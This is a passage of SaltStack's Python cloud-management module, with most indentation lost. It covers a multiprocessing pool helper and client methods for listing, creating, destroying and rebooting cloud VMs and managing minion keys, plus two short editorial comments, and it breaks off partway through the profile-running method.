"""called with [queue, args, kwargs] as first optional arg"""
kwargs["queue"] = queue
ret = None
try:
ret = func(*args, **kwargs)
queue.put("END")
except KeyboardInterrupt as ex:
trace = traceback.format_exc()
queue.put("KEYBOARDINT")
queue.put("Keyboard interrupt")
queue.put("{0}\n{1}\n".format(ex, trace))
except Exception as ex: # pylint: disable=broad-except
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("Exception")
queue.put("{0}\n{1}\n".format(ex, trace))
return ret
return _call
def enter_mainloop(
target,
mapped_args=None,
args=None,
kwargs=None,
pool=None,
pool_size=None,
callback=None,
queue=None,
):
"""
Manage a multiprocessing pool
- If the queue does not output anything, the pool runs indefinitely
- If the queue returns KEYBOARDINT or ERROR, this will kill the pool
by calling terminate & join, and end with a SaltCloudSystemExit
exception notifying callers of the abnormal termination
- If the queue returns END, or callback is defined and returns True,
it just joins the pool and returns the data.
target
the function you want to execute via multiprocessing
pool
pool object; can be None if you want a default pool, but you'll
then have to define pool_size instead
pool_size
pool size if you did not provide a pool yourself
callback
a callable taking a string argument and returning True to
signal that 'target' is finished and the pool needs to be
joined
queue
A custom multiprocessing queue in case you want to do
extra stuff and need it later in your program
args
positional arguments to call the function with
if you don't want to use pool.map
mapped_args
a list of one or more argument combinations to call the function with
e.g. (foo, [[1], [2]]) will call::
foo([1])
foo([2])
kwargs
keyword arguments to pass to the function
Attention, the function must have the following signature:
target(queue, *args, **kw)
You may use the 'communicator' decorator to generate such a function
(see end of this file)
"""
if not kwargs:
kwargs = {}
if not pool_size:
pool_size = 1
if not pool:
pool = multiprocessing.Pool(pool_size)
if not queue:
manager = multiprocessing.Manager()
queue = manager.Queue()
if mapped_args is not None and not mapped_args:
msg = (
"We are called to asynchronously execute {0}"
" but we do no have anything to execute, weird,"
" we bail out".format(target)
)
log.error(msg)
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif mapped_args is not None:
iterable = [[queue, [arg], kwargs] for arg in mapped_args]
ret = pool.map(func=target, iterable=iterable)
else:
ret = pool.apply(target, [queue, args, kwargs])
while True:
test = queue.get()
if test in ["ERROR", "KEYBOARDINT"]:
type_ = queue.get()
trace = queue.get()
msg = "Caught {0}, terminating workers\n".format(type_)
msg += "TRACE: {0}\n".format(trace)
log.error(msg)
pool.terminate()
pool.join()
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif test in ["END"] or (callback and callback(test)):
pool.close()
pool.join()
break
else:
time.sleep(0.125)
return ret
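# Editorial sketch: the queue protocol that enter_mainloop() polls for, shown
# outside of any Pool purely for illustration. A communicator-wrapped callable
# pushes "END" on success, or "ERROR"/"KEYBOARDINT" followed by a type marker
# and a traceback on failure. The stub queue and worker below are hypothetical
# and only demonstrate the contract; they are not part of Salt's API.
def _example_communicator_protocol():
    class _StubQueue(object):
        """Minimal stand-in for Manager().Queue(); only put/get are needed."""

        def __init__(self):
            self.items = []

        def put(self, item):
            self.items.append(item)

        def get(self):
            return self.items.pop(0)

    stub = _StubQueue()
    wrapped = communicator(lambda queue=None: "done")
    result = wrapped(stub, (), {})  # matches _call(queue, args, kwargs) above
    assert stub.get() == "END"  # the success marker the mainloop waits for
    return result  # "done"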
class CloudClient(object):
"""
The client class to wrap cloud interactions
"""
def __init__(self, path=None, opts=None, config_dir=None, pillars=None):
if opts:
self.opts = opts
else:
self.opts = salt.config.cloud_config(path)
# Check the cache-dir exists. If not, create it.
v_dirs = [self.opts["cachedir"]]
salt.utils.verify.verify_env(v_dirs, salt.utils.user.get_user())
if pillars:
for name, provider in six.iteritems(pillars.pop("providers", {})):
driver = provider["driver"]
provider["profiles"] = {}
self.opts["providers"].update({name: {driver: provider}})
for name, profile in six.iteritems(pillars.pop("profiles", {})):
provider = profile["provider"].split(":")[0]
driver = next(six.iterkeys(self.opts["providers"][provider]))
profile["provider"] = "{0}:{1}".format(provider, driver)
profile["profile"] = name
self.opts["profiles"].update({name: profile})
self.opts["providers"][provider][driver]["profiles"].update(
{name: profile}
)
for name, map_dct in six.iteritems(pillars.pop("maps", {})):
if "maps" not in self.opts:
self.opts["maps"] = {}
self.opts["maps"][name] = map_dct
self.opts.update(pillars)
def _opts_defaults(self, **kwargs):
"""
Set the opts dict to defaults and allow for opts to be overridden in
the kwargs
"""
# Let's start with the default salt cloud configuration
opts = salt.config.DEFAULT_CLOUD_OPTS.copy()
# Update it with the loaded configuration
opts.update(self.opts.copy())
# Reset some of the settings to sane values
opts["parallel"] = False
opts["keep_tmp"] = False
opts["deploy"] = True
opts["update_bootstrap"] = False
opts["show_deploy_args"] = False
opts["script_args"] = ""
# Update it with the passed kwargs
if "kwargs" in kwargs:
opts.update(kwargs["kwargs"])
opts.update(kwargs)
profile = opts.get("profile", None)
# filter other profiles if one is specified
if profile:
tmp_profiles = opts.get("profiles", {}).copy()
for _profile in [a for a in tmp_profiles]:
if not _profile == profile:
tmp_profiles.pop(_profile)
# if profile is specified and we have enough info about providers
# also filter them to speedup methods like
# __filter_non_working_providers
providers = [
a.get("provider", "").split(":")[0]
for a in six.itervalues(tmp_profiles)
if a.get("provider", "")
]
if providers:
_providers = opts.get("providers", {})
for provider in _providers.copy():
if provider not in providers:
_providers.pop(provider)
return opts
def low(self, fun, low):
"""
Pass the cloud function and low data structure to run
"""
l_fun = getattr(self, fun)
f_call = salt.utils.args.format_call(l_fun, low)
return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
def list_sizes(self, provider=None):
"""
List all available sizes in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.size_list(provider))
def list_images(self, provider=None):
"""
List all available images in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.image_list(provider))
def list_locations(self, provider=None):
"""
List all available locations in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.location_list(provider))
def query(self, query_type="list_nodes"):
"""
Query basic instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes"
return mapper.map_providers_parallel(query_type)
def full_query(self, query_type="list_nodes_full"):
"""
Query all instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_full"
return mapper.map_providers_parallel(query_type)
def select_query(self, query_type="list_nodes_select"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_select"
return mapper.map_providers_parallel(query_type)
def min_query(self, query_type="list_nodes_min"):
"""
Query minimal instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_min"
return mapper.map_providers_parallel(query_type)
def profile(self, profile, names, vm_overrides=None, **kwargs):
"""
Pass in a profile to create; names is a list of VM names to allocate.
vm_overrides is a special dict of per-node option overrides.
Example:
.. code-block:: python
>>> client= salt.cloud.CloudClient(path='/etc/salt/cloud')
>>> client.profile('do_512_git', names=['minion01',])
{'minion01': {'backups_active': 'False',
'created_at': '2014-09-04T18:10:15Z',
'droplet': {'event_id': 31000502,
'id': 2530006,
'image_id': 5140006,
'name': 'minion01',
'size_id': 66},
'id': '2530006',
'image_id': '5140006',
'ip_address': '107.XXX.XXX.XXX',
'locked': 'True',
'name': 'minion01',
'private_ip_address': None,
'region_id': '4',
'size_id': '66',
'status': 'new'}}
"""
if not vm_overrides:
vm_overrides = {}
kwargs["profile"] = profile
mapper = salt.cloud.Map(self._opts_defaults(**kwargs))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(
mapper.run_profile(profile, names, vm_overrides=vm_overrides)
)
def map_run(self, path=None, **kwargs):
"""
To execute a map
"""
kwarg = {}
if path:
kwarg["map"] = path
kwarg.update(kwargs)
mapper = salt.cloud.Map(self._opts_defaults(**kwarg))
dmap = mapper.map_data()
return salt.utils.data.simple_types_filter(mapper.run_map(dmap))
def destroy(self, names):
"""
Destroy the named VMs
"""
mapper = salt.cloud.Map(self._opts_defaults(destroy=True))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(mapper.destroy(names))
def create(self, provider, names, **kwargs):
"""
Create the named VMs, without using a profile
Example:
.. code-block:: python
client.create(provider='my-ec2-config', names=['myinstance'],
image='ami-1624987f', size='t1.micro', ssh_username='ec2-user',
securitygroup='default', delvol_on_destroy=True)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = self.opts["providers"]
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
vm_ = kwargs.copy()
vm_["name"] = name
vm_["driver"] = provider
# This function doesn't require a profile, but many cloud drivers
# check for profile information (which includes the provider key) to
# help with config file debugging and setting up instances. Setting
# the profile and provider defaults here avoids errors in other
# cloud functions relying on these keys. See SaltStack Issue #41971
# and PR #38166 for more information.
vm_["profile"] = None
vm_["provider"] = provider
ret[name] = salt.utils.data.simple_types_filter(mapper.create(vm_))
return ret
def extra_action(self, names, provider, action, **kwargs):
"""
Perform actions with block storage devices
Example:
.. code-block:: python
client.extra_action(names=['myblock'], action='volume_create',
provider='my-nova', kwargs={'voltype': 'SSD', 'size': 1000}
)
client.extra_action(names=['salt-net'], action='network_create',
provider='my-nova', kwargs={'cidr': '192.168.100.0/24'}
)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = mapper.map_providers_parallel()
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
extra_ = kwargs.copy()
extra_["name"] = name
extra_["provider"] = provider
extra_["profile"] = None
extra_["action"] = action
ret[name] = salt.utils.data.simple_types_filter(mapper.extras(extra_))
return ret
def action(
self,
fun=None,
cloudmap=None,
names=None,
provider=None,
instance=None,
kwargs=None,
):
"""
Execute a single action via the cloud plugin backend
Examples:
.. code-block:: python
client.action(fun='show_instance', names=['myinstance'])
client.action(fun='show_image', provider='my-ec2-config',
kwargs={'image': 'ami-10314d79'}
)
"""
if kwargs is None:
kwargs = {}
mapper = salt.cloud.Map(self._opts_defaults(action=fun, names=names, **kwargs))
if instance:
if names:
raise SaltCloudConfigError(
"Please specify either a list of 'names' or a single "
"'instance', but not both."
)
names = [instance]
if names and not provider:
self.opts["action"] = fun
return mapper.do_action(names, kwargs)
if provider and not names:
return mapper.do_function(provider, fun, kwargs)
else:
# This should not be called without either an instance or a
# provider. If both an instance/list of names and a provider
# are given, then we also need to exit. We can only have one
# or the other.
raise SaltCloudConfigError(
"Either an instance (or list of names) or a provider must be "
"specified, but not both."
)
class Cloud(object):
"""
An object for the creation of new VMs
"""
def __init__(self, opts):
self.opts = opts
self.clouds = salt.loader.clouds(self.opts)
self.__filter_non_working_providers()
self.__cached_provider_queries = {}
def get_configured_providers(self):
"""
Return the configured providers
"""
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
if len(drivers) > 1:
for driver in drivers:
providers.add("{0}:{1}".format(alias, driver))
continue
providers.add(alias)
return providers
def lookup_providers(self, lookup):
"""
Get a dict describing the configured providers
"""
if lookup is None:
lookup = "all"
if lookup == "all":
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit("There are no cloud providers configured.")
return providers
if ":" in lookup:
alias, driver = lookup.split(":")
if (
alias not in self.opts["providers"]
or driver not in self.opts["providers"][alias]
):
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. Available: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
if lookup in (alias, driver):
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. "
"Available selections: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
return providers
def lookup_profiles(self, provider, lookup):
"""
Return a dictionary describing the configured profiles
"""
if provider is None:
provider = "all"
if lookup is None:
lookup = "all"
if lookup == "all":
profiles = set()
provider_profiles = set()
for alias, info in six.iteritems(self.opts["profiles"]):
providers = info.get("provider")
if providers:
given_prov_name = providers.split(":")[0]
salt_prov_name = providers.split(":")[1]
if given_prov_name == provider:
provider_profiles.add((alias, given_prov_name))
elif salt_prov_name == provider:
provider_profiles.add((alias, salt_prov_name))
profiles.add((alias, given_prov_name))
if not profiles:
raise SaltCloudSystemExit("There are no cloud profiles configured.")
if provider != "all":
return provider_profiles
return profiles
def map_providers(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
pmap = {}
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver, details in six.iteritems(drivers):
fun = "{0}.{1}".format(driver, query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
if alias not in pmap:
pmap[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
pmap[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for "
"running nodes: %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any
# nodes
pmap[alias][driver] = []
self.__cached_provider_queries[query] = pmap
return pmap
def map_providers_parallel(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
Same as map_providers but query in parallel.
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
opts = self.opts.copy()
multiprocessing_data = []
# Optimize Providers
opts["providers"] = self._optimize_providers(opts["providers"])
for alias, drivers in six.iteritems(opts["providers"]):
# Use a temp query for this driver to avoid overwriting it for the next one
this_query = query
for driver, details in six.iteritems(drivers):
# If the driver has a list_nodes_min function, use it as the query
# to check existing VMs on this driver with minimal information.
# Otherwise, keep using the original query param.
if (
opts.get("selected_query_option") is None
and "{0}.list_nodes_min".format(driver) in self.clouds
):
this_query = "list_nodes_min"
fun = "{0}.{1}".format(driver, this_query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
multiprocessing_data.append(
{
"fun": fun,
"opts": opts,
"query": this_query,
"alias": alias,
"driver": driver,
}
)
output = {}
if not multiprocessing_data:
return output
data_count = len(multiprocessing_data)
pool = multiprocessing.Pool(
data_count < 10 and data_count or 10, init_pool_worker
)
parallel_pmap = enter_mainloop(
_run_parallel_map_providers_query, multiprocessing_data, pool=pool
)
for alias, driver, details in parallel_pmap:
if not details:
# There are no provider details?! Skip it!
continue
if alias not in output:
output[alias] = {}
output[alias][driver] = details
self.__cached_provider_queries[query] = output
return output
def get_running_by_names(
self, names, query="list_nodes", cached=False, profile=None
):
if isinstance(names, six.string_types):
names = [names]
matches = {}
handled_drivers = {}
mapped_providers = self.map_providers_parallel(query, cached=cached)
for alias, drivers in six.iteritems(mapped_providers):
for driver, vms in six.iteritems(drivers):
if driver not in handled_drivers:
handled_drivers[driver] = alias
# When a profile is specified, only return an instance
# that matches the provider specified in the profile.
# This solves the issues when many providers return the
# same instance. For example there may be one provider for
# each availability zone in amazon in the same region, but
# the search returns the same instance for each provider
# because amazon returns all instances in a region, not
# availability zone.
if (
profile
and alias
not in self.opts["profiles"][profile]["provider"].split(":")[0]
):
continue
for vm_name, details in six.iteritems(vms):
# XXX: The logic below can be removed once the aws driver
# is removed
if vm_name not in names:
continue
elif (
driver == "ec2"
and "aws" in handled_drivers
and "aws" in matches[handled_drivers["aws"]]
and vm_name in matches[handled_drivers["aws"]]["aws"]
):
continue
elif (
driver == "aws"
and "ec2" in handled_drivers
and "ec2" in matches[handled_drivers["ec2"]]
and vm_name in matches[handled_drivers["ec2"]]["ec2"]
):
continue
if alias not in matches:
matches[alias] = {}
if driver not in matches[alias]:
matches[alias][driver] = {}
matches[alias][driver][vm_name] = details
return matches
def _optimize_providers(self, providers):
"""
Return an optimized mapping of available providers
"""
new_providers = {}
provider_by_driver = {}
for alias, driver in six.iteritems(providers):
for name, data in six.iteritems(driver):
if name not in provider_by_driver:
provider_by_driver[name] = {}
provider_by_driver[name][alias] = data
for driver, providers_data in six.iteritems(provider_by_driver):
fun = "{0}.optimize_providers".format(driver)
if fun not in self.clouds:
log.debug("The '%s' cloud driver is unable to be optimized.", driver)
for name, prov_data in six.iteritems(providers_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
continue
new_data = self.clouds[fun](providers_data)
if new_data:
for name, prov_data in six.iteritems(new_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
return new_providers
def location_list(self, lookup="all"):
"""
Return a mapping of all location data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_locations".format(driver)
if fun not in self.clouds:
# The capability to gather locations is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the locations information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def image_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_images".format(driver)
if fun not in self.clouds:
# The capability to gather images is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the images information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def size_list(self, lookup="all"):
"""
Return a mapping of all size data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_sizes".format(driver)
if fun not in self.clouds:
# The capability to gather sizes is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the sizes information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def provider_list(self, lookup="all"):
"""
Return a mapping of all configured providers and their drivers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def profile_list(self, provider, lookup="all"):
"""
Return a mapping of all configured profiles
"""
data = {}
lookups = self.lookup_profiles(provider, lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def create_all(self):
"""
Create/Verify the VMs in the VM data
"""
ret = []
for vm_name, vm_details in six.iteritems(self.opts["profiles"]):
ret.append({vm_name: self.create(vm_details)})
return ret
def destroy(self, names, cached=False):
"""
Destroy the named VMs
"""
processed = {}
names = set(names)
matching = self.get_running_by_names(names, cached=cached)
vms_to_destroy = set()
parallel_data = []
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for name in vms:
if name in names:
vms_to_destroy.add((alias, driver, name))
if self.opts["parallel"]:
parallel_data.append(
{
"opts": self.opts,
"name": name,
"alias": alias,
"driver": driver,
}
)
# destroying in parallel
if self.opts["parallel"] and parallel_data:
# set the pool size based on configuration or default to
# the number of machines we're destroying
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Destroying in parallel mode; " "Cloud pool size: %s", pool_size)
# kick off the parallel destroy
output_multip = enter_mainloop(
_destroy_multiprocessing, parallel_data, pool_size=pool_size
)
# massage the multiprocessing output a bit
ret_multip = {}
for obj in output_multip:
ret_multip.update(obj)
# build up a data structure similar to what the non-parallel
# destroy uses
for obj in parallel_data:
alias = obj["alias"]
driver = obj["driver"]
name = obj["name"]
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret_multip[name]
if name in names:
names.remove(name)
# not destroying in parallel
else:
log.info("Destroying in non-parallel mode.")
for alias, driver, name in vms_to_destroy:
fun = "{0}.destroy".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
ret = self.clouds[fun](name)
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret
if name in names:
names.remove(name)
# now the processed data structure contains the output from either
# the parallel or non-parallel destroy and we should finish up
# with removing minion keys if necessary
for alias, driver, name in vms_to_destroy:
ret = processed[alias][driver][name]
if not ret:
continue
vm_ = {
"name": name,
"profile": None,
"provider": ":".join([alias, driver]),
"driver": driver,
}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
key_file = os.path.join(
self.opts["pki_dir"], "minions", minion_dict.get("id", name)
)
globbed_key_file = glob.glob("{0}.*".format(key_file))
if not os.path.isfile(key_file) and not globbed_key_file:
# There's no such key file!? It might have been renamed
if isinstance(ret, dict) and "newname" in ret:
salt.utils.cloud.remove_key(self.opts["pki_dir"], ret["newname"])
continue
if os.path.isfile(key_file) and not globbed_key_file:
# Single key entry. Remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(key_file)
)
continue
# Since we have globbed matches, there are probably some keys whose minion
# configuration has append_domain set.
if (
not os.path.isfile(key_file)
and globbed_key_file
and len(globbed_key_file) == 1
):
# Single entry, let's remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(globbed_key_file[0])
)
continue
# Since we can't get the profile or map entry used to create
# the VM, we can't also get the append_domain setting.
# And if we reached this point, we have several minion keys
# whose name starts with the machine name we're deleting.
# We need to ask one by one!?
print(
"There are several minion keys who's name starts "
"with '{0}'. We need to ask you which one should be "
"deleted:".format(name)
)
while True:
for idx, filename in enumerate(globbed_key_file):
print(" {0}: {1}".format(idx, os.path.basename(filename)))
selection = input("Which minion key should be deleted(number)? ")
try:
selection = int(selection)
except ValueError:
print("'{0}' is not a valid selection.".format(selection))
try:
filename = os.path.basename(globbed_key_file.pop(selection))
except Exception: # pylint: disable=broad-except
continue
delete = input("Delete '{0}'? [Y/n]? ".format(filename))
if delete == "" or delete.lower().startswith("y"):
salt.utils.cloud.remove_key(self.opts["pki_dir"], filename)
print("Deleted '{0}'".format(filename))
break
print("Did not delete '{0}'".format(filename))
break
if names and not processed:
# These machines were asked to be destroyed but could not be found
raise SaltCloudSystemExit(
"The following VM's were not found: {0}".format(", ".join(names))
)
elif names and processed:
processed["Not Found"] = names
elif not processed:
raise SaltCloudSystemExit("No machines were destroyed!")
return processed
def reboot(self, names):
"""
Reboot the named VMs
"""
ret = []
pmap = self.map_providers_parallel()
acts = {}
for prov, nodes in six.iteritems(pmap):
acts[prov] = []
for node in nodes:
if node in names:
acts[prov].append(node)
for prov, names_ in six.iteritems(acts):
fun = "{0}.reboot".format(prov)
for name in names_:
ret.append({name: self.clouds[fun](name)})
return ret
def create(self, vm_, local_master=True):
"""
Create a single VM
"""
output = {}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
alias, driver = vm_["provider"].split(":")
fun = "{0}.create".format(driver)
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
vm_["name"],
vm_["provider"],
driver,
)
return
deploy = salt.config.get_cloud_config_value("deploy", vm_, self.opts)
make_master = salt.config.get_cloud_config_value("make_master", vm_, self.opts)
if deploy:
if not make_master and "master" not in minion_dict:
log.warning(
"There's no master defined on the '%s' VM settings.", vm_["name"]
)
if "pub_key" not in vm_ and "priv_key" not in vm_:
log.debug("Generating minion keys for '%s'", vm_["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["pub_key"] = pub
vm_["priv_key"] = priv
else:
# Note(pabelanger): We still reference pub_key and priv_key when
# deploy is disabled.
vm_["pub_key"] = None
vm_["priv_key"] = None
key_id = minion_dict.get("id", vm_["name"])
domain = vm_.get("domain")
if vm_.get("use_fqdn") and domain:
minion_dict["append_domain"] = domain
if "append_domain" in minion_dict:
key_id = ".".join([key_id, minion_dict["append_domain"]])
if make_master is True and "master_pub" not in vm_ and "master_pem" not in vm_:
log.debug("Generating the master keys for '%s'", vm_["name"])
master_priv, master_pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["master_pub"] = master_pub
vm_["master_pem"] = master_priv
if local_master is True and deploy is True:
# Accept the key on the local master
salt.utils.cloud.accept_key(self.opts["pki_dir"], vm_["pub_key"], key_id)
vm_["os"] = salt.config.get_cloud_config_value("script", vm_, self.opts)
try:
vm_["inline_script"] = salt.config.get_cloud_config_value(
"inline_script", vm_, self.opts
)
except KeyError:
pass
try:
alias, driver = vm_["provider"].split(":")
func = "{0}.create".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
output = self.clouds[func](vm_)
if output is not False and "sync_after_install" in self.opts:
if self.opts["sync_after_install"] not in (
"all",
"modules",
"states",
"grains",
):
log.error("Bad option for sync_after_install")
return output
# A small pause helps the sync work more reliably
time.sleep(3)
start = int(time.time())
while int(time.time()) < start + 60:
# We'll try every <timeout> seconds, up to a minute
mopts_ = salt.config.DEFAULT_MASTER_OPTS
conf_path = "/".join(self.opts["conf_file"].split("/")[:-1])
mopts_.update(
salt.config.master_config(os.path.join(conf_path, "master"))
)
client = salt.client.get_local_client(mopts=mopts_)
ret = client.cmd(
vm_["name"],
"saltutil.sync_{0}".format(self.opts["sync_after_install"]),
timeout=self.opts["timeout"],
)
if ret:
log.info(
six.u(
"Synchronized the following dynamic modules: " " {0}"
).format(ret)
)
break
except KeyError as exc:
log.exception(
"Failed to create VM %s. Configuration value %s needs " "to be set",
vm_["name"],
exc,
)
# If it's a map then we need to respect the 'requires'
# so we do it later
try:
opt_map = self.opts["map"]
except KeyError:
opt_map = False
if self.opts["parallel"] and self.opts["start_action"] and not opt_map:
log.info("Running %s on %s", self.opts["start_action"], vm_["name"])
client = salt.client.get_local_client(mopts=self.opts)
action_out = client.cmd(
vm_["name"],
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
)
output["ret"] = action_out
return output
@staticmethod
def vm_config(name, main, provider, profile, overrides):
"""
Create vm config.
:param str name: The name of the vm
:param dict main: The main cloud config
:param dict provider: The provider config
:param dict profile: The profile config
:param dict overrides: The vm's config overrides
"""
vm = main.copy()
vm = salt.utils.dictupdate.update(vm, provider)
vm = salt.utils.dictupdate.update(vm, profile)
vm.update(overrides)
vm["name"] = name
return vm
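# Editorial illustration (hypothetical values): vm_config() layers the dicts
# with later sources winning, i.e. overrides > profile > provider > main. For
# example, main={'deploy': True}, provider={'image': 'a'},
# profile={'image': 'b', 'size': 's'}, overrides={'size': 'xl'} yields
# {'deploy': True, 'image': 'b', 'size': 'xl', 'name': name}.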
def extras(self, extra_):
"""
Extra actions
"""
output = {}
alias, driver = extra_["provider"].split(":")
fun = "{0}.{1}".format(driver, extra_["action"])
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
extra_["name"],
extra_["provider"],
driver,
)
return
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=extra_["provider"]
):
output = self.clouds[fun](**extra_)
except KeyError as exc:
log.exception(
"Failed to perform %s.%s on %s. "
"Configuration value %s needs to be set",
extra_["provider"],
extra_["action"],
extra_["name"],
exc,
)
return output
def run_profile(self, profile, names, vm_overrides=None):
"""
Parse over the options passed on the command line and determine how to
handle them
"""
if profile not in self.opts["profiles"]:
msg = "Profile {0} is not defined".format(profile)
log.error(msg)
return {"Error": msg}
ret = {}
if not vm_overrides:
vm_overrides = {}
try:
with salt.utils.files.fopen(self.opts["conf_file"], "r") as mcc:
main_cloud_config = salt.utils.yaml.safe_load(mcc)
if not main_cloud_config:
main_cloud_config = {}
except KeyError:
main_cloud_config = {}
except IOError:
main_cloud_config = {}
if main_cloud_config is None:
main_cloud_config = {}
mapped_providers = self.map_providers_parallel()
profile_details = self.opts["profiles"][profile]
vms = {}
for prov, val in six.iteritems(mapped_providers):
prov_name = next(iter(val))
for node in mapped_providers[prov][prov_name]:
vms[node] = mapped_providers[prov][prov_name][node]
vms[node]["provider"] = prov
vms[node]["driver"] = prov_name
alias, driver = profile_details["provider"].split(":")
provider_details = self.opts["providers"][alias][driver].copy()
del provider_details["profiles"]
for name in names:
if name in vms:
prov = vms[name]["provider"]
driv = vms[name]["driver"]
msg = "{0} already exists under {1}:{2}".format(name, prov, driv)
log.error(msg)
ret[name] = {"Error": msg}
continue
vm_ = self.vm_config(
name,
main_cloud_config,
provider_details,
profile_details,
vm_overrides,
)
if self.opts["parallel"]:
process = multiprocessing.Process(target=self.create, args=(vm_,))
process.start()
ret[name] = {
